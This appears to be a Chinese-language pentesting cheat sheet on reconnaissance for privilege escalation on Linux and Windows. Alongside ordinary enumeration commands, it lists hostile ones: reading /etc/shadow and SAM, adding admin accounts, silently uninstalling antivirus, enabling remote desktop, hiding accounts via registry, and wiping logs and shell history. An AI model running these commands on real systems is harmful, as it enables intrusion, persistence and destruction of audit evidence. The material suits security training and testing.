渗透测试之提权:信息收集
一、基本信息收集
1、Linux 系统
/etc/resolv.conf #查DNS设置
/etc/passwd #查帐号
/etc/shadow #查密码
whoami and who –a #查当前账号及已登录的所有账号
ifconfig -a #查IP相关信息
iptables -L #查防火墙
netstat –rn #查看当前系统网关以及路由设置,地址欺骗
uname –a #查系统内核版本
ps aux #查看进程
dpkg -l| head #列出已安装的所有软件包(ii:该包已安装,r:该包已删除,c:配置文件还存在)
示例:
2、Windows 系统
ipconfig /all #查看所有的IP配置
ipconfig /displaydns #查看当前DNS缓存【可发现系统管理员经常浏览的网页】
netstat -bnao,netstat -r #查看路由
net view,net view /domain #查网络共享
net user /domain,net user %username% /domain #域账号信息
net accounts,net share #查看所开的共享
net localgroup administrators username /add #将username添加到本地管理员组
net group "Domain Controllers" /domain #查看Domain Controllers里的主机账号/域控制器
net share name$=C:\ /unlimited #将C盘共享出来,并不做限制(所有权限)
net user username /active:yes /domain #域环境下,将锁定账号启动
示例:
3、windows平台下的命令工具
WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)
wmic nicconfig get ipaddress,macaddress #查询IP地址/mac地址
wmic computersystem get username #当前登陆账号
wmic netlogin get name,lastlogon #用户登录记录
wmic process get caption, executablepath,commandline #查看当前进程与命令方式
wmic process where name=“calc.exe" call terminate #结束一个进程【calc.exe计算器】
wmic os get name,servicepackmajorversion #提取操作系统服务版本
wmic product get name,version #查看操作系统安装的软件
wmic product where name=“<name>” call uninstall /nointeractive #删掉某些软件【如:杀毒软件】#nointeractive 后台静默运行
wmic share get /ALL #查看共享文件夹
wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1" #开启远程桌面,支持本地、远程的执行
如:wmic /node:"localhost" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
wmic nteventlog get path,filename, writeable #查看当前系统日志对应哪些系统文件
eventvwr / eventvwr.msc # 打开事件查看器
示例:
二、敏感信息收集
商业信息
系统信息(基本信息收集)
1、Linux
/etc ;/usr/local/etc #一般存放有配置文件
/etc/password ;/etc/shadow
.ssh ;.gnupg 公私钥 #linux以.为首的目录/文件都是隐藏的,ls -ll 可查看
The e-mail and data files #邮件/数据文件
业务数据库 ;身份认证服务器数据库
/tmp #linux中的临时目录,存放临时数据【有可能泄露机密数据】
2、windows
SAM 数据库 ; 注册表文件
%SYSTEMROOT%\repair\SAM #SAM进行修复操作时,保存的SAM副本
%SYSTEMROOT%\System32\config\RegBack\SAM #注册表备份
业务数据库 ; 身份认证数据库
临时文件目录 #病毒经常驻留的地方
UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\
三、隐藏痕迹
1、Windows
禁止在登陆界面显示新建账号(username),此方法只能在登录界面隐藏,即该操作之后依旧可通过net user 查到,可通过其他方法使net user 也查不到。
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v username /T REG_DWORD /D 0
del %WINDIR%\*.log /a/s/q/f #静默强制删除日志
2、Linux
History #查看曾经运行的命令【保存文件位置:bash_history】
history -c #删除history记录
lsattr #查看文件属性
chattr +i .bash_history #修改文件属性为 i【i:无法修改】,如果不起作用可以将原来的bash_history文件删掉重新建个,再将 i 属性加上。
示例:
3、日志
不同的linux系统,日志文件名称也许不一样。
auth.log / secure #存放用户的登录及身分认证信息
btmp / wtmp #数据文件
lastlog / faillog
其他日志和 HIDS 等
示例: